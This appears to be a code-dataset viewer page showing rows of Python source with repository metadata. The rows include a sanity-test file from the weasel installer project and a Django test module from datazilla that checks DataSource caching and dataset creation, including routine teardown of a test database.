                    x.append((line[0][nx_0] + line[0][nx_1] + line[0][nx] + line[0][nx_3] + line[0][nx_4])*scale/5)
                for ny in range(NY):
                    ny_0 = (ny - 4)%NY
                    ny_1 = (ny + 2)%NY
                    ny_3 = (ny - 2)%NY
                    ny_4 = (ny + 4)%NY
                    y.append((line[1][ny_0] + line[1][ny_1] + line[1][ny] + line[1][ny_3] + line[1][ny_4])*scale/5)
                d += createPath.d(x,y)
            paths.append([d, node_name, colors_for_map[node_name]])
    return paths, real_data
|
UTF-8
|
Python
| false | false | 2,013 |
7,610,682,051,757 |
0d7f78df907491ffbb8e12e6b53443481117c4eb
|
169f491c1584d7b37640fd33302e0f666bb50e24
|
/test/textui_test/sessions_test/test_testenv.py
|
c4be3940a8d73e87a6284da8686851e061eb4b59
|
[
"GPL-2.0-only",
"GPL-1.0-or-later",
"LicenseRef-scancode-other-copyleft"
] |
non_permissive
|
vmware/weasel
|
https://github.com/vmware/weasel
|
0ea79ae56ecff9ae0ed5529399cbb5631a70df0e
|
ff9c06b4c77b06067b40c5a0f342e2b15dc99601
|
refs/heads/master
| 2016-09-06T12:59:45.045784 | 2013-03-07T04:53:19 | 2013-03-07T04:53:19 | 6,079,420 | 17 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
#-*- coding: utf-8 -*-
'''Sanity tests to confirm that the test environment is being built up.
'''
def test_noop():
    """Smoke test: confirms the test runner itself collects and executes."""
    assert True
def test_faux():
    """Confirm the faux (stub) environment modules import and look sane.

    NOTE(review): FAUXROOT is presumably None until a faux chroot is
    activated -- confirm against the fauxroot module's contract.
    """
    import fauxroot
    assert fauxroot.FAUXROOT == None
    import fauxTextuiIO
    # A len() >= 0 check only proves fauxStdin exists and is sized.
    assert len(fauxTextuiIO.fauxStdin) >= 0
def test_goodconfig1():
    """Confirm fauxconfig exposes truthy vmkctl and parted stub attributes."""
    import fauxconfig
    assert fauxconfig.vmkctl
    assert fauxconfig.parted
|
UTF-8
|
Python
| false | false | 2,013 |
4,818,953,325,371 |
5d71051c533da1408ad7d120f74b11962050f92b
|
34ed622445d76667a0a57e5343face153cc68399
|
/tests/model/sql/test_models.py
|
278c2c78dcb11b35a648c9b812fd1baaef3743b0
|
[
"MPL-2.0"
] |
non_permissive
|
mozilla/datazilla
|
https://github.com/mozilla/datazilla
|
7211a1f8275fc6bbdc42f9cb3dcdebe4d101baf7
|
9f5b2bf779ca8b179501c6e283695778cb59febe
|
refs/heads/master
| 2023-09-02T20:43:51.966533 | 2014-10-23T17:00:02 | 2014-10-23T17:00:02 | 4,148,916 | 3 | 3 | null | false | 2014-10-23T17:00:02 | 2012-04-26T15:10:56 | 2014-08-29T16:19:20 | 2014-10-23T17:00:02 | 16,186 | 42 | 15 | 0 |
JavaScript
| null | null |
import datetime
from contextlib import contextmanager
# Module-wide counter so every test DataSource gets a unique dataset number.
dataset_num = 1

def create_datasource(model, **kwargs):
    """Create and return a test DataSource through *model*.

    Fills sensible defaults for every field, consuming the next value of
    the module-global ``dataset_num`` counter so dataset numbers (and the
    derived default name) stay unique across a test run.  Any keyword
    argument overrides its default; ``name`` defaults to
    "<project>_<contenttype>_<dataset>" when not supplied.
    """
    global dataset_num
    values = {
        "project": "foo",
        "dataset": dataset_num,
        "contenttype": "perftest",
        "host": "localhost",
        "type": "MySQL-InnoDB",
        "creation_date": datetime.datetime.now(),
        "cron_batch": "small",
    }
    dataset_num += 1
    values.update(kwargs)
    if "name" not in values:
        values["name"] = "%s_%s_%s" % (
            values["project"], values["contenttype"], values["dataset"])
    return model.objects.create(**values)
@contextmanager
def assert_num_queries(queries):
    """Context manager asserting exactly *queries* DB queries run inside it.

    Temporarily forces Django's debug cursor on so queries are recorded,
    counts how many executed within the ``with`` block, and restores the
    previous debug-cursor setting afterwards.  The count is only checked
    when the block exits without raising.
    """
    from django.db import connection
    previous_flag = connection.use_debug_cursor
    connection.use_debug_cursor = True
    before = len(connection.queries)
    try:
        yield
        executed = len(connection.queries) - before
        msg = "Expected {0} queries, executed {1}".format(queries, executed)
        assert executed == queries, msg
    finally:
        connection.use_debug_cursor = previous_flag
def pytest_funcarg__DataSource(request):
    """
    Gives a test access to the DataSource model class.

    Legacy pytest funcarg-style fixture; ``request`` is required by the
    protocol but unused.  The import is deferred so collecting this module
    does not require Django to be configured.
    """
    from datazilla.model.sql.models import DataSource
    return DataSource
def test_datasources_cached(DataSource):
    """Requesting the full list of DataSources twice only hits the DB once."""
    # Ensure at least one row exists so the cached list is non-trivial.
    create_datasource(DataSource)
    # First call is allowed to query and populates the cache.
    DataSource.objects.cached()
    # Second call must be served entirely from cache: zero queries.
    with assert_num_queries(0):
        DataSource.objects.cached()
def test_datasource_cache_invalidated(DataSource):
    """Saving a new datasource invalidates the datasource cache."""
    # prime the cache
    initial = DataSource.objects.cached()
    # create a new datasource
    create_datasource(DataSource)
    # new datasource appears in the list immediately
    # (i.e. cached() re-queries instead of serving the stale list)
    assert len(DataSource.objects.cached()) == len(initial) + 1
def test_create_next_dataset(ptm, DataSource):
    """Creating the next dataset keeps all the important fields.

    Uses the ``ptm`` project-test-model fixture's perftest source to spawn
    dataset 2, then compares the stored row (minus volatile fields) against
    the expected field values.  Requires a live MySQL server, since
    create_next_dataset() creates a real database that is dropped below.
    """
    sds = ptm.sources["perftest"]
    sds2 = sds.create_next_dataset()
    # Fetch the freshly created row; dataset number should have bumped to 2.
    act = DataSource.objects.filter(dataset=2).values()[0]
    #remove fields we don't want to compare
    del(act["creation_date"])
    del(act["id"])
    del(act["host"])
    del(act["type"])
    exp = {'contenttype': u'perftest',
           'cron_batch': "small",
           'dataset': 2L,
           'name': u'{0}_perftest_2'.format(ptm.project),
           'read_only_host': None,
           'oauth_consumer_key': None,
           'oauth_consumer_secret': None,
           'project': unicode(ptm.project),
           }
    # special cleanup
    # drop the new database we created
    from django.conf import settings
    import MySQLdb
    conn = MySQLdb.connect(
        host=sds2.datasource.host,
        user=settings.DATAZILLA_DATABASE_USER,
        passwd=settings.DATAZILLA_DATABASE_PASSWORD,
    )
    cur = conn.cursor()
    cur.execute("DROP DATABASE {0}".format(sds2.datasource.name))
    conn.close()
    # NOTE(review): comparing after cleanup means a failure leaves no stray
    # database behind, but the cursor is never explicitly closed -- confirm
    # that is acceptable for the test MySQL connection.
    assert act == exp
|
UTF-8
|
Python
| false | false | 2,014 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.